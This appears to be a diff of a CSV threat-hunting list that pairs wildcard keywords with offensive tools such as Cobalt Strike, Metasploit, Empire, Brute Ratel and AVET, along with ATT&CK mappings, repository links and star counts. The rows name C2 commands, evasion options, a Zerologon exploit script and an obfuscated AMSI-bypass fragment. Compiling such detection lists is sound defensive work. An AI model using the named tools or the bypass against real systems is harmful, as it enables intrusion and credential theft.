- T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*set payload *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*set PAYLOAD *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*set pipename *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set PAYLOAD *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*set pipename *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*set 
Profile apt1.profile*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*set shellcode *","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" -"*set smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" -"*set userwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set 
userwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*set zombie *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*set_child werfault.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*set_command_exec exec_via_cmd*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" 
@@ -16407,7 +16590,7 @@
 "*set_command_exec no_command*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
 "*set_command_source download_bitsadmin*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
 "*set_decoder xor*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
-"*set_empty_pw.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","555","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z"
+"*set_empty_pw.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","556","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z"
 "*set_injection_technique*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
 "*set_logon_script.py*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z"
 "*set_objectpipe \\*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
@@ -16422,53 +16605,53 @@ "*set_wmiconfig \*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*setc_webshell*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*Set-DCShadowPermissions*","offensive_tool_keyword","AD exploitation 
cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Set-DCShadowPermissions*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Set-DesktopACLToAllow*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Set-DCShadowPermissions*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Set-DesktopACLToAllow*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Set-DomainObject*","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Seth by SySS GmbH*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & 
Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" -"*seth.py * -j INJECT*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" -"*Seth-master.zip*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*Seth by SySS GmbH*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*seth.py * -j INJECT*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*Seth-master.zip*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 
'uZx'*","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass Obfuscation example for copy-paste purposes","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*set-killdate *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Set-Killdate*","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - 